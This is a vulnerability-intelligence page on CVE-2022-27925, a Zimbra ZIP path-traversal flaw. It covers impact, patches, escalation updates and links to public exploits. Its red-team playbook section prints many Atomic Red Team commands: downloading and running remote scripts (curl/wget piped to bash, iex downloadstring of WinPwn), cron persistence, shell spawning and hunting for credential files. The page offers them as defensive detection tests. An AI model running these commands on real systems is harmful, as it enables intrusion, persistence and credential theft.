CVE-2022-27925
Overview
This vulnerability is a directory traversal flaw rooted in improper validation of file paths during ZIP archive extraction within the mboximport functionality of Zimbra Collaboration Suite versions 8.8.15 and 9.0. The affected component processes ZIP archives uploaded by authenticated administrators, failing to sanitize file names, which allows crafted archive entries to escape intended extraction directories.
Vulnerability Description
Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.
Impact
An attacker with administrator credentials can leverage this vulnerability to write arbitrary files anywhere on the server filesystem, potentially overwriting critical configuration or executable files. This capability can lead to full system compromise, including remote code execution and persistent backdoors. The prerequisite is possession of an administrator-level account in Zimbra Collaboration Suite. Successful exploitation can result in data breaches, lateral movement within the network, and disruption of mail services.
Solution
Synacor has addressed this issue in updated releases of Zimbra Collaboration Suite. Administrators should upgrade to versions later than 8.8.15 patch 12 or apply the 9.0.0 patch 24 update as detailed in the Zimbra Security Advisories and Zimbra Releases pages (https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories, https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24). These advisories provide specific patch instructions and recommend applying the latest security updates promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Zimbra Collaboration Suite versions 8.8.15 and 9.0 arises from the mboximport functionality, which allows authenticated users with administrative privileges to upload ZIP archives. The core issue lies in the improper handling of file extraction, specifically enabling directory traversal attacks. This flaw permits an attacker to manipulate the file paths within the ZIP archive, potentially leading to the extraction of files outside the intended directory. By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive files on the server, posing a significant risk to the integrity and confidentiality of the system.
Attack vectors for this vulnerability are primarily centered around the exploitation of the mboximport feature. An authenticated administrator could craft a malicious ZIP file containing directory traversal sequences (e.g., "../") that, when extracted, would place files in unintended locations on the server. This could allow the attacker to overwrite critical system files, upload web shells, or extract sensitive data such as configuration files, user credentials, or other critical assets. The ability to execute arbitrary file uploads significantly amplifies the risk, as it opens the door to further exploitation, including remote code execution and data breaches.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Zimbra for email and collaboration. If exploited, an attacker could gain access to sensitive communications, proprietary information, or even user data, leading to potential regulatory breaches and loss of customer trust. The business risks associated with such an incident include financial losses from remediation efforts, legal liabilities, and reputational damage. Moreover, the presence of sensitive files on the server could facilitate lateral movement within the organization, allowing attackers to target additional systems and escalate their privileges further.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Zimbra Collaboration Suite to the latest patched versions is crucial, as vendors typically address such vulnerabilities in their updates. Additionally, monitoring file upload activities and implementing strict validation checks on uploaded files can help prevent the exploitation of this vulnerability. Employing intrusion detection systems (IDS) to identify anomalous behavior related to file uploads can also serve as an early warning mechanism. Furthermore, organizations should enforce the principle of least privilege, ensuring that only necessary personnel have administrative access to the system, thereby reducing the attack surface.
In conclusion, the vulnerability within the Zimbra Collaboration Suite poses a significant threat to organizations utilizing this software. The potential for directory traversal and arbitrary file uploads can lead to severe consequences, including data breaches and operational disruptions. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to detect, mitigate, and respond to such security threats effectively. A proactive approach to cybersecurity, including regular updates, monitoring, and access control, is essential to safeguarding sensitive information and maintaining trust in organizational systems.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2022-27925. This surge is characterized by the emergence of multiple public proof-of-concept exploits hosted on prominent code repositories, alongside the release of a Metasploit module that significantly lowers the technical barrier for threat actors to weaponize this vulnerability. Our telemetry indicates that these developments have catalyzed a rapid expansion of the exploit landscape, with adversaries increasingly incorporating this vulnerability into their toolkits. The addition of CVE-2022-27925 to the CISA KEV catalog further underscores its criticality, particularly given documented ransomware group interest in leveraging this flaw for initial access or lateral movement. The EPSS score nearing certainty reflects an imminent risk of widespread exploitation. Consequently, the threat level has escalated to high, signaling that defenders must anticipate more frequent and sophisticated attack attempts exploiting directory traversal and arbitrary file upload capabilities inherent in affected Zimbra Collaboration Suite versions.
Update 2 — July 09, 2026
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2022-27925, accompanied by the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms. This expansion of the exploit landscape indicates increased attacker interest and lowers the barrier for adversaries to weaponize the vulnerability. Our telemetry shows a steady upward trend in detection activity, underscoring a growing operational tempo among threat actors, including ransomware groups known to leverage this flaw for initial access and lateral movement. Although the EPSS score has inched higher, reflecting a marginally increased likelihood of exploitation, the qualitative escalation in sightings and exploit availability collectively elevate the threat environment. Consequently, the risk level associated with CVE-2022-27925 has intensified, signaling defenders should anticipate more frequent and sophisticated exploitation attempts exploiting the directory traversal and arbitrary file upload vectors inherent in affected Zimbra Collaboration Suite versions.
Update 3 — July 31, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-27925, accompanied by the emergence of multiple new proof-of-concept exploits circulating within attacker communities. This surge in activity reflects increased adversary interest and capability to leverage the directory traversal and arbitrary file upload vulnerabilities in Zimbra Collaboration Suite versions 8.8.15 and 9.0. Our telemetry indicates that threat actors, including ransomware groups previously linked to this flaw, are intensifying their operations, which aligns with the slight upward adjustment in the EPSS score. The proliferation of publicly available exploit code lowers the barrier to entry for less sophisticated attackers, thereby broadening the threat landscape. Consequently, the risk level associated with this vulnerability has escalated from high to critical, underscoring an urgent need for heightened vigilance and proactive defense measures within affected environments.
Update 4 — August 18, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-27925, accompanied by an expansion in the diversity and sophistication of publicly available proof-of-concept exploits. Our telemetry reveals that threat actors, including ransomware affiliates previously associated with this vulnerability, are increasingly leveraging these tools to conduct more frequent and complex intrusion campaigns. This intensification signals a shift from opportunistic scanning toward more targeted exploitation efforts, elevating the operational risk for organizations running affected Zimbra Collaboration Suite versions. The broader dissemination of exploit code lowers the technical barrier for adversaries, enabling a wider range of threat actors to capitalize on this vulnerability. Consequently, the threat level has been reassessed to critical, reflecting the heightened likelihood of successful compromise and potential ransomware deployment within vulnerable environments.
Affected Products (55)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:-:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p1:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p10:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p11:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p12:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p13:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p14:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p15:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p16:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p17:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p18:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p19:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p2:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p20:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p21:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p22:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p23:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p24:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p25:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p26:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)
exploits/linux/http/zimbra_mboximport_cve_2022_27925
|
Volexity Threat Research, Yang_99's Nest, Ron Bowes | Unknown | - | View |
GitHub PoCs (14)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
vnhacker1337/CVE-2022-27925-PoC
Zimbra RCE simple poc
|
vnhacker1337 | 65 | 21 | 2022-08-12 | View |
|
Josexv1/CVE-2022-27925
Zimbra CVE-2022-27925 PoC
|
Josexv1 | 43 | 19 | 2022-08-20 | View |
|
sh4den/CVE-2022-27925
A loader for zimbra 2022 rce (cve-2022-27925)
|
sh4den | 18 | 4 | 2022-10-01 | View |
|
SystemVll/CVE-2022-27925
A loader for zimbra 2022 rce (cve-2022-27925)
|
SystemVll | 18 | 4 | 2022-10-01 | View |
|
huahuatzt/CVE-2022-27925
|
huahuatzt | 0 | 14 | 2022-08-15 | View |
|
jam620/Zimbra
CVE-2022-27925
|
jam620 | 8 | 1 | 2022-09-25 | View |
|
Chocapikk/CVE-2022-27925-Revshell
Python Script to exploit Zimbra Auth Bypass + RCE (CVE-2022-27925)
|
Chocapikk | 5 | 1 | 2022-08-26 | View |
|
akincibor/CVE-2022-27925
CVE-2022-27925 nuclei template
|
akincibor | 3 | 0 | 2022-09-12 | View |
|
touchmycrazyredhat/CVE-2022-27925-Revshell
|
touchmycrazyredhat | 1 | 2 | 2022-09-17 | View |
|
navokus/CVE-2022-27925
|
navokus | 0 | 1 | 2022-08-20 | View |
|
onlyHerold22/CVE-2022-27925-PoC
|
onlyHerold22 | 0 | 1 | 2022-10-19 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
sanan2004/CVE-2022-27925
PoC
|
sanan2004 | 0 | 0 | 2024-08-19 | View |
|
miko550/CVE-2022-27925
|
miko550 | 0 | 0 | 2022-08-19 | View |
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-27925 |
| wiki.zimbra.com |
GitHub CVE
x_refsource_MISC
|
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories |
| wiki.zimbra.com |
GitHub CVE
x_refsource_MISC
|
https://wiki.zimbra.com/wiki/Security_Center |
| wiki.zimbra.com |
GitHub CVE
x_refsource_MISC
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/168146/Zimbra-Zip-Path-Traversal.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-27925 |